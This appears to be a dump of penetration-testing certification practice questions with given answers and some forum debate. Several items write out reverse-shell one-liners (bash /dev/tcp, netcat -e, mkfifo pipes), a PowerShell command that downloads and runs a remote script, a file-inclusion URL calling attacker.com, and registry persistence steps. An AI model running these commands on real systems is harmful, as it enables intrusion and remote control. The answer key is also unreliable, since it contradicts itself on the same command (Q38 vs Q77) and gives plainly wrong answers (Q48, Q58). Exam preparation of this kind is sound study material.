C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21

A

D. dsquery -o -rdn -limit 21

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
21
Q

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?

A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_CURRENT_USER
D. HKEY_CURRENT_CONFIG

A

C. HKEY_CURRENT_USER

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
22
Q

In which of the following scenarios would a tester perform a Kerberoasting attack?

A. The tester has compromised a Windows device and dumps the LSA secrets.
B. The tester needs to retrieve the SAM database and crack the password hashes.
C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.
D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.

A

C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
23
Q

Which of the following excerpts would come from a corporate policy?

A. Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
B. The help desk can be reached at 800-passwd1 to perform password resets.
C. Employees must use strong passwords for accessing corporate assets.
D. The corporate systems must store passwords using the MD5 hashing algorithm.

A

D. The corporate systems must store passwords using the MD5 hashing algorithm.

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
24
Q

Consider the following PowerShell command:

powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/ script.ps1″);Invoke-Cmdlet
Which of the following BEST describes the actions performed by this command?

A. Set the execution policy.
B. Execute a remote script.
C. Run an encoded command.
D. Instantiate an object.

A

B. Execute a remote script.

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
25
Q

During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

A. Locating emergency exits
B. Preparing a pretext
C. Shoulder surfing the victim
D. Tailgating the victim

A

B. Preparing a pretext

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
26
Q

A penetration tester is performing a code review. Which of the following testing techniques is being performed?

A. Dynamic analysis
B. Fuzzing analysis
C. Static analysis
D. Run-time analysis

A

C. Static analysis

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
27
Q

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?

A. Enable HTTP Strict Transport Security.
B. Enable a secure cookie flag.
C. Encrypt the communication channel.
D. Sanitize invalid user input.

A

A. Enable HTTP Strict Transport Security.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
28
Q

A security assessor completed a comprehensive penetration test of a company and its networks and systems. During the assessment, the tester identified a vulnerability in the crypto library used for TLS on the company’s intranet-wide payroll web application. However, the vulnerability has not yet been patched by the vendor, although a patch is expected within days. Which of the following strategies would BEST mitigate the risk of impact?

A. Modify the web server crypto configuration to use a stronger cipher-suite for encryption, hashing, and digital signing.

B. Implement new training to be aware of the risks in accessing the application. This training can be decommissioned after the vulnerability is patched.

C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.

D. Require payroll users to change the passwords used to authenticate to the application. Following the patching of the vulnerability, implement another required password change.

A

C. Implement an ACL to restrict access to the application exclusively to the finance department. Reopen the application to company staff after the vulnerability is patched.

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
29
Q

An email sent from the Chief Executive Officer (CEO) to the Chief Financial Officer (CFO) states a wire transfer is needed to pay a new vendor. Neither is aware of the vendor, and the CEO denies ever sending the email. Which of the following types of motivation was used in this attack?

A. Principle of fear
B. Principle of authority
C. Principle of scarcity
D. Principle of likeness
E. Principle of social proof

A

B. Principle of authority

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
30
Q

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company’s software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?

A. Discovery scan
B. Stealth scan
C. Full scan
D. Credentialed scan

A

A. Discovery scan

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
31
Q

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:

https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php

Which of the following remediation steps should be taken to prevent this type of attack?

A. Implement a blacklist.
B. Block URL redirections.
C. Double URL encode the parameters.
D. Stop external calls from the application.

A

B. Block URL redirections.

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
32
Q

A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

A. Vulnerability scan
B. Dynamic scan
C. Static scan
D. Compliance scan

A

B. Dynamic scan

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
33
Q

An engineer, who is conducting a penetration test for a web application, discovers the user login process sends from field data using the HTTP GET method. To mitigate the risk of exposing sensitive information, the form should be sent using an:

A. HTTP POST method.
B. HTTP OPTIONS method.
C. HTTP PUT method.
D. HTTP TRACE method.

A

A. HTTP POST method.

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
34
Q

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?

A. nmap -p 53 -oG dnslist.txt | cut -d “:” -f 4

B. nslookup -ns 8.8.8.8 << dnslist.txt

C. for x in {1…254}; do dig -x 192.168.$x.$x; done

D. dig -r > echo “8.8.8.8” >> /etc/resolv.conf

A

C. for x in {1…254}; do dig -x 192.168.$x.$x; done

100%

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
35
Q

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user’s home folder titled ”changepass.”
-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass

Using “strings” to print ASCII printable characters from changepass, the tester notes the following:

$ strings changepass
exit
setuid
strcmp
GLIBC_2.0
ENV_PATH
%s/changepw
malloc
strlen

Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?

A. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.

B. Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path ‘/home/user/’. Then run changepass.

C. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token- stealing binary titled changepw. Then run changepass.

D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.

A

D. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of ‘/usr/local/bin’.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
36
Q

A penetration tester has successfully deployed an evil twin and is starting to see some victim traffic. The next step the penetration tester wants to take is to capture all the victim web traffic unencrypted. Which of the following would BEST meet this goal?

A. Perform an HTTP downgrade attack.
B. Harvest the user credentials to decrypt traffic.
C. Perform an MITM attack.
D. Implement a CA attack by impersonating trusted CAs.

A

A. Perform an HTTP downgrade attack.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
37
Q

Which of the following types of intrusion techniques is the use of an “under-the-door tool” during a physical security assessment an example of?

A. Lockpicking
B. Egress sensor triggering
C. Lock bumping
D. Lock bypass

A

D. Lock bypass

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
38
Q

The following line was found in an exploited machine’s history file. An attacker ran the following command:

bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?

A. Performs a port scan.
B. Grabs the web server’s banner.
C. Redirects a TTY to a remote system.
D. Removes error logs for the supplied IP.

A

A. Performs a port scan.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
39
Q

Which of the following are MOST important when planning for an engagement? (Select TWO).

A. Goals/objectives
B. Architectural diagrams
C. Tolerance to impact
D. Storage time for a report
E. Company policies

A

A. Goals/objectives

C. Tolerance to impact

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
40
Q

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

A. Command injection attack
B. Clickjacking attack
C. Directory traversal attack
D. Remote file inclusion attack

A

B. Clickjacking attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
41
Q

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

A. perl -e ‘use SOCKET’; $i=’; $p=’443;
B. ssh superadmin@ -p 443
C. nc -e /bin/sh 443
D. bash -i >& /dev/tcp//443 0>&1

A

D. bash -i >& /dev/tcp//443 0>&1

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
42
Q

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

A. From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal

B. From the local computer, run the following command:
ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm

C. From the remote computer, run the following command:
ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 “xhost+; xterm”

D. From the local computer, run the following command:
nc -l -p 6000
Then, from the remote computer, run the following command:
xterm | nc 192.168.1.10 6000

A

A. From the remote computer, run the following commands:
export XHOST 192.168.1.10:0.0
xhost+
Terminal

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
43
Q

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?

A. Appendices
B. Executive summary
C. Technical summary
D. Main body

A

B. Executive summary

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
44
Q

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).

A. Convert to JAR.
B. Decompile.
C. Cross-compile the application.
D. Convert JAR files to DEX.
E. Re-sign the APK.
F. Attach to ADB.

A

A. Convert to JAR.
B. Decompile.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
45
Q

Which of the following commands starts the Metasploit database?

Which of the following commands starts the Metasploit database?

A. msfconsole

B. workspace

C. msfvenom

D. db_init

E. db_connect

A

A. msfconsole

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
46
Q

Consumer-based IoT devices are often less secure than systems built for traditional desktop computers. Which of the following BEST describes the reasoning for this?

A. Manufacturers developing IoT devices are less concerned with security.

B. It is difficult for administrators to implement the same security standards across the board.

C. IoT systems often lack the hardware power required by more secure solutions.

D. Regulatory authorities often have lower security requirements for IoT systems.

A

A. Manufacturers developing IoT devices are less concerned with security.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
47
Q

During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

A. nc 192.168.1.5 44444
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/ tmp/f
D. nc -e /bin/sh 192.168.1.5 44444
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 444444>/ tmp/f
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.5.1 44444>/ tmp/f

A

B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.5 44444>/ tmp/f

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
48
Q

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?

A. Stack pointer register
B. Index pointer register
C. Stack base pointer
D. Destination index register

A

A. Stack pointer register

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
49
Q

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?

A. Sample SOAP messages
B. The REST API documentation
C. A protocol fuzzing utility
D. An applicable XSD file

A

D. An applicable XSD file

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
50
Q

Which of the following is an example of a spear phishing attack?

A. Targeting an executive with an SMS attack
B. Targeting a specific team with an email attack
C. Targeting random users with a USB key drop
D. Targeting an organization with a watering hole attack

A

A. Targeting an executive with an SMS attack

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
51
Q

A healthcare organization must abide by local regulations to protect and attest to the protection of personal health information of covered individuals. Which of the following conditions should a penetration tester specifically test for when performing an assessment? (Select TWO).

A. Cleartext exposure of SNMP trap data
B. Software bugs resident in the IT ticketing system
C. S/MIME certificate templates defined by the CA
D. Health information communicated over HTTP
E. DAR encryption on records servers

A

D. Health information communicated over HTTP
E. DAR encryption on records servers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
52
Q

An energy company contracted a security firm to perform a penetration test of a power plant, which employs ICS to manage power generation and cooling. Which of the following is a consideration unique to such an environment that must be made by the firm when preparing for the assessment?

A. Selection of the appropriate set of security testing tools
B. Current and load ratings of the ICS components
C. Potential operational and safety hazards
D. Electrical certification of hardware used in the test

A

A. Selection of the appropriate set of security testing tools

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
53
Q

A client has requested an external network penetration test for compliance purposes. During discussion between the client and the penetration tester, the client expresses unwillingness to add the penetration tester’s source IP addresses to the client’s IPS whitelist for the duration of the test. Which of the following is the BEST argument as to why the penetration tester’s source IP addresses should be whitelisted?

A. Whitelisting prevents a possible inadvertent DoS attack against the IPS and supporting log-monitoring systems.

B. Penetration testing of third-party IPS systems often requires additional documentation and authorizations; potentially delaying the time-sensitive test.

C. IPS whitelisting rules require frequent updates to stay current, constantly developing vulnerabilities and newly discovered weaknesses.

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

A

D. Testing should focus on the discovery of possible security issues across all in-scope systems, not on determining the relative effectiveness of active defenses such as an IPS.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
54
Q

A malicious user wants to perform an MITM attack on a computer. The computer network configuration is given below:

IP: 192.168.1.20
NETMASK: 255.255.255.0
DEFAULT GATEWAY: 192.168.1.254
DHCP: 192.168.1.253
DNS: 192.168.10.10, 192.168.20.10

Which of the following commands should the malicious user execute to perform the MITM attack?

A. arpspoof -c both -r -t 192.168.1.1 192.168.1.20
B. arpspoof -t 192.168.1.20 192.168.1.254
C. arpspoof -c both -t 192.168.1.20 192.168.1.253
D. arpspoof -r -t 192.168.1.253 192.168.1.20

A

B. arpspoof -t 192.168.1.20 192.168.1.254

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
55
Q

A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation. Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).

A. Randomize local administrator credentials for each machine.
B. Disable remote logons for local administrators.
C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.
F. Enable full-disk encryption on every workstation.
G. Segment each host into its own VLAN.

A

C. Require multifactor authentication for all logins.
D. Increase minimum password complexity requirements.
E. Apply additional network access control.

56
Q

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?

A. MAC address of the client
B. MAC address of the domain controller
C. MAC address of the web server
D. MAC address of the gateway

A

D. MAC address of the gateway

57
Q

Which of the following tools would a penetration tester leverage to conduct OSINT? (Select TWO).

A. Shodan
B. SET
C. BeEF
D. Wireshark
E. Maltego
F. Dynamo

A

A. Shodan

E. Maltego

58
Q

Black box penetration testing strategy provides the tester with:

A. a target list
B. a network diagram
C. source code
D. privileged credentials

A

D. privileged credentials

59
Q

A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?

A. Randomize the credentials used to log in.
B. Install host-based intrusion detection.
C. Implement input normalization.
D. Perform system hardening.

A

D. Perform system hardening.

60
Q

A penetration tester observes that several high-numbered ports are listening on a public web server. However, the system owner says the application only uses port 443. Which of the following would be BEST to recommend?

A. Transition the application to another port.
B. Filter port 443 to specific IP addresses.
C. Implement a web application firewall.
D. Disable unneeded services.

A

D. Disable unneeded services.

61
Q

A penetration tester reviews the scan results of a web application. Which of the following vulnerabilities is MOST critical and should be prioritized for exploitation?

A. Stored XSS
B. Fill path disclosure
C. Expired certificate
D. Clickjacking

A

A. Stored XSS

62
Q

A security consultant receives a document outlining the scope of an upcoming penetration test. This document contains IP addresses and times that each can be scanned. Which of the following would contain this information?

A. Rules of engagement
B. Request for proposal
C. Master service agreement
D. Business impact analysis

A

A. Rules of engagement

63
Q

A penetration tester wants to target NETBIOS name service. Which of the following is the MOST likely command to exploit the NETBIOS name service?

A. arpspoof
B. nmap
C. responder
D. burpsuite

A

B. nmap

64
Q

Which of the following is the reason why a penetration tester would run the chkconfig –del command at the end of an engagement?
servicename

A. To remove the persistence
B. To enable persistence
C. To report persistence
D. To check for persistence

A

A. To remove the persistence

65
Q

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?

A. Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.

B. Identify the issues that can be remediated most quickly and address them first.

C. Implement the least impactful of the critical vulnerabilities’ remediations first, and then address other critical vulnerabilities

D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.

A

D. Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.

66
Q

Which of the following situations would cause a penetration tester to communicate with a system owner/ client during the course of a test? (Select TWO.)

A. The tester discovers personally identifiable data on the system.
B. The system shows evidence of prior unauthorized compromise.
C. The system shows a lack of hardening throughout.
D. The system becomes unavailable following an attempted exploit.
E. The tester discovers a finding on an out-of-scope system.

A

B. The system shows evidence of prior unauthorized compromise.

D. The system becomes unavailable following an attempted exploit.

67
Q

Which of the following tools is used to perform a credential brute force attack?

A. Hydra
B. John the Ripper
C. Hashcat
D. Peach

A

A. Hydra

68
Q

A penetration tester has gained access to a marketing employee’s device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.
B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.
C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
D. Create a fake service in Windows called RTAudio to execute manually.
E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
F. Create a scheduled task to call C:\windows\system32\drivers\etc\hosts.

A

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.

C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.

69
Q

A security analyst was provided with a detailed penetration report, which was performed against the organization’s DMZ environment. It was noted on the report that a finding has a CVSS base score of 10.0. Which of the following levels of difficulty would be required to exploit this vulnerability?

A. Very difficult; perimeter systems are usually behind a firewall.
B. Somewhat difficult; would require significant processing power to exploit.
C. Trivial; little effort is required to exploit this finding.
D. Impossible; external hosts are hardened to protect against attacks.

A

C. Trivial; little effort is required to exploit this finding.

70
Q

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?

A. ICS vendors are slow to implement adequate security controls.
B. ICS staff are not adequately trained to perform basic duties.
C. There is a scarcity of replacement equipment for critical devices.
D. There is a lack of compliance for ICS facilities.

A

B. ICS staff are not adequately trained to perform basic duties.

71
Q

A client has scheduled a wireless penetration test. Which of the following describes the scoping target information MOST likely needed before testing can begin?

A. The physical location and network ESSIDs to be tested
B. The number of wireless devices owned by the client
C. The client’s preferred wireless access point vendor
D. The bands and frequencies used by the client’s devices

A

D. The bands and frequencies used by the client’s devices

72
Q

A penetration tester identifies the following findings during an external vulnerability scan:

Which of the following attack strategies should be prioritized from the scan results above?

A. Obsolete software may contain exploitable components.

B. Weak password management practices may be employed.

C. Cryptographically weak protocols may be intercepted.

D. Web server configurations may reveal sensitive information.

A

D. Web server configurations may reveal sensitive information.

100%

73
Q

A penetration tester has been asked to conduct OS fingering with Nmap using a company-provided text file that contains a list of IP addresses. Which of the following are needed to conduct this scan? (Choose two).

A. -O

B. -iL

C. -V

D. -sS

E. oN

F. -oX

A

A. -O

B. -iL

100%

74
Q

A penetration tester has compromised a host. Which of the following would be the correct syntax to create a Netcat listener on the device?

A. nc -l -p 4444 /bin/bash

B. nc -vp 4444 /bin/bash

C. nc -p 4444 /bin/bash

D. nc -lp 4444 /bin/bash

A

D. nc -lp 4444 /bin/bash

100%

75
Q

In which of the following scenarios would a tester perform a Kerberoasting attack?

A. The tester has compromised a Windows device and dumps the LSA secrets.

B. The tester needs to retrieve the SAM database and crack the password hashes.

C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

D. The tester has compromised an account and needs to dump hashes and plaintext passwords from the system.

A

C. The tester has compromised a limited-privilege user and needs to target other accounts for lateral movement.

100%

76
Q

A penetration tester wants to check manually if a “ghost” vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?

A. Download the GHOST file to a Linux system and compile gcc -o GHOST test i: ./GHOST

B. Download the GHOST file to a Windows system and compile gcc -o GHOST GHOST.c test i: ./GHOST

C. Download the GHOST file to a Linux system and compile gcc -o GHOST.c test i: ./GHOST

D. Download the GHOST file to a Windows system and compile gcc -o GHOST test i: ./GHOST

A

C. Download the GHOST file to a Linux system and compile gcc -o GHOST.c test i: ./GHOST

100%

77
Q

The following line was found in an exploited machine’s history file. An attacker ran the following command: bash -i >& /dev/tcp/192.168.0.1/80 0> &1
Which of the following describes what the command does?

A. Performs a port scan.

B. Grabs the web server’s banner.

C. Redirects a TTY to a remote system.

D. Removes error logs for the supplied IP.

A

C. Redirects a TTY to a remote system.

100%

78
Q

A penetration tester ran the following Nmap scan on a computer: nmap -aV 192.168.1.5
The organization said it had disabled Telnet from its environment. However, the results of the Nmap scan show port 22 as closed and port 23 as open to SSH.
Which of the following is the BEST explanation for what happened?

A. The organization failed to disable Telnet.

B. Nmap results contain a false positive for port 23.

C. Port 22 was filtered.

D. The service is running on a non-standard port.

A

A. The organization failed to disable Telnet

100%

79
Q

A penetration tester has gained access to a marketing employee’s device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.

B. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.

C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.

D. Create a fake service in Windows called RTAudio to execute manually.

E. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.

F. Create a schedule task to call C:\windows\system32\drivers\etc\hosts.

A

A. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.

C. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.

100%

80
Q

DRAG DROP -
Instructions:
Analyze the code segments to determine which sections are needed to complete a port scanning script.
Drag the appropriate elements into the correct locations to complete the script.
During a penetration test, you gain access to a system with a limited user interface. This machine appears to have access to an isolated network that you would like to port scan.
Select and Place:

A

mr_robot

4 months ago

Not sure about this one, the code looks incomplete for me like why 2 loops? But I would guess: 1 - #!/usr/bin/python 2- ports = [21,22] 3- for port in ports: … 4- run_scan(sys.argv[1], ports)

upvoted 6 times

terrylai2010

3 months, 2 weeks ago

Agreed. As the “import xxx” should belong to the Python language, but not to Ruby.

upvoted 2 times

D1960

2 months, 3 weeks ago

For step 3: 3- for port in ports: … I am not certain which block you mean. There are two blocks that start with that.

upvoted 1 times

D1960

2 months, 3 weeks ago

I have been working with this quite a lot. Aside from the numerous typos, this script is badly designed, and will not work as shown. That said, I think the best answers are: 1 - #!/usr/bin/python 2 - ports = [21,22] 3 - port_scan(ip, ports) 4 - for port in ports: … The ‘s’ and the ‘ip’ must be defined for the ‘for loop’ to run correctly. The ‘s’ and the ‘ip’ are defined in the ‘port_scan’ function. Therefore the ‘port_scan’ must be run before the ‘for loop’ The function is badly messed-up, and should not be there at all. Instead of the function, these lines should be included: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ip = sys.argv[1] The function is also not called correctly. Still that comes closest to actually working.

upvoted 1 times

D1960

2 months, 3 weeks ago

Unless the for-loop is inside the function. Then it would be: 1 - #!/usr/bin/python 2- ports = [21,22] 3- for port in ports: … 4- run_scan(sys.argv[1], ports)

upvoted 1 times

Tom_Catman

1 month, 2 weeks ago

Just realize it might be $port in $ports, not S but $

upvoted 1 times

mr_robot

1 month, 2 weeks ago

I am not a coder so correct me if I am wrong. This is clearly a Python code because: Python uses “import” vs Ruby uses “require” Python uses “print” vs Ruby uses “puts” Python uses variables like “port=21” vs Ruby has different types of variables and if we were to use a variable starting with “$” (Global variables begin with $) we would need to create a class. (https://www.tutorialspoint.com/ruby/ruby_variables.htm) So I would still stick with the below: 1 - #!/usr/bin/python 2- ports = [21,22] 3- for port in ports: … 4- run_scan(sys.argv[1], ports) Now what if the exam there is no #!/usr/bin/python but only #!/usr/bin/ruby ?

upvoted 2 times

81
Q

In a physical penetration tester testing scenario. the penetration tester obtains physical access to a laptop. The laptop is logged in but locked. Which of the following is a potential NEXT step to extract credentials from the device?

A. Brute force the user’s password.

B. Perform an ARP spoofing attack.

C. Leverage the BeEF framework to capture credentials.

D. Conduct LLMNR/NETBIOS-ns poisoning.

A

D. Conduct LLMNR/NETBIOS-ns poisoning

100%

D1960

5 months ago

“A” seems to make sense. But according to Sybex Comptia PenTest+ Practice Test - Chapter 3 Question 190: the answer is “D”

upvoted 1 times

mr_robot

4 months, 1 week ago

PenTest+ Practice Tests Book - SYBEX D. - Link Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NetBIOS-NS) poisoning can provide penetration testers with the ability to obtain a man-in-the-middle position, broadening their ability to gain access and information. One of the most commonly targeted services in a Windows network is NetBIOS. NetBIOS is commonly used for file sharing.

upvoted 1 times

MikeHunt

3 months, 2 weeks ago

brute forcing the system will lock it out and cause suspicion. But if you MITM the system and wait for the user to authenticate the system will send a user/hash out that can be used to either replay or brute force offline

upvoted 1 times

D1960

3 months, 2 weeks ago

If I have physical access to your laptop, but I cannot login, then how do I MITM the system?

upvoted 1 times

D1960

3 months, 2 weeks ago

If I have physical access, I can - possibly - reboot the system to a cdrom or thumbdrive with John-the-Ripper on it. Using that I can gain the user’s local credentials. I have actually done this for users that forgot their passwords.

upvoted 1 times

mr_robot

1 month, 3 weeks ago

Agree. If you have already physical access to the laptop, you don’t need to conduct LLMNR/NETBIOS-ns poisoning by MITM to the device. I would go with A. https://bit.ly/2YmpsFg https://www.aptive.co.uk/blog/llmnr-nbt-ns-spoofing/ https://attack.mitre.org/techniques/T1171/

upvoted 2 times

mr_robot

1 month, 2 weeks ago

Even if you wait for the user to log back in to the machine you still need to rely on the user to mistype a server connection (like a typo from a share ex: \fileserser) in order for the LLMNR/NETBIOS-ns poisoning attack to work. You could use something like this for a brute forcing attack : https://bit.ly/3eFXYjI

82
Q

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:

Which of the following types of vulnerabilities is being exploited?

A. Forced browsing vulnerability

B. Parameter pollution vulnerability

C. File upload vulnerability

D. Cookie enumeration

A

D. Cookie enumeration

100%

mr_robot

4 months, 1 week ago

Probably D? I believe the pentester is trying to use cookie enumeration in order to guess a session ID from an user who has got access to files from that specific area of the site - RTSdocuments. “PHPSESSID – The PHPSESSID cookie is native to PHP and enables websites to store serialised state data. It is used to establish a user session and to pass state data via a temporary cookie, which is commonly referred to as a session cookie. (expires when you close your browser).” https://www.catchments.ie/cookie-policy/ https://www.netsparker.com/blog/web-security/cross-site-cookie-manipulation/ I don’t think it’s A because there are no variables from user details in the link in order to get access to RTSdocuments.

upvoted 2 times

mr_robot

2 months, 4 weeks ago

Just some more examples. Cookie Enumeration: https://0x00sec.org/t/stealing-cookies-for-fun-and-profit-phpsessid-theory/1607 Forced browsing vulnerability https://owasp.org/www-community/attacks/Forced_browsing https://campus.barracuda.com/product/webapplicationfirewall/doc/42049348/forced-browsing-attack/ Parameter pollution vulnerability https://www.imperva.com/learn/application-security/http-parameter-pollution/ File upload vulnerability https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload

upvoted 1 times

mr_robot

2 months, 1 week ago

Digging deeper into this, I believe this is more like A - Forced browsing vulnerability. The attacker is trying to guess a restricted page in order to have access to it - https://www.test.com/Bank/Tax/RTSdocuments/ “Forced browsing vulnerabilities occur when hidden privileged resources are directly accessible through their URL. A forced browsing vulnerability exists if a privileged page is not guarded and thus reachable through forced browsing. Often, this kind of vulnerability occurs when developers try to “hide” a page by only displaying protected links to that page. In these cases, a malicious unprivileged user might be able to perform a privilege escalation attack by correctly guessing the URL of the “hidden” page.”

upvoted 2 times

mr_robot

2 months, 1 week ago

At the same time, this looks like a clear example of cookie enumeration so I am not really sure which one is the correct answer for this. Any thoughts? https://portswigger.net/support/using-burp-to-hack-cookies-and-manipulate-sessions https://bit.ly/2AlKWZF

upvoted 1 times

Tom_Catman

1 month, 2 weeks ago

It’s a POST request. Forced browsing usually are GET requests.

upvoted 1 times

boblee

1 month, 3 weeks ago

the answer is A.

83
Q

A tester intends to run the following command on a target system: bash -i >& /dev/tcp/10.2.4.6/443 0> &1
Which of the following additional commands would need to be executed on the tester’s Linux system to make the previous command successful?

A. nc -nlvp 443

B. nc 10.2.4.6. 443

C. nc -w3 10.2.4.6 443

D. nc -e /bin/sh 10.2.4.6. 443

A

A. nc -nlvp 443

100%

84
Q

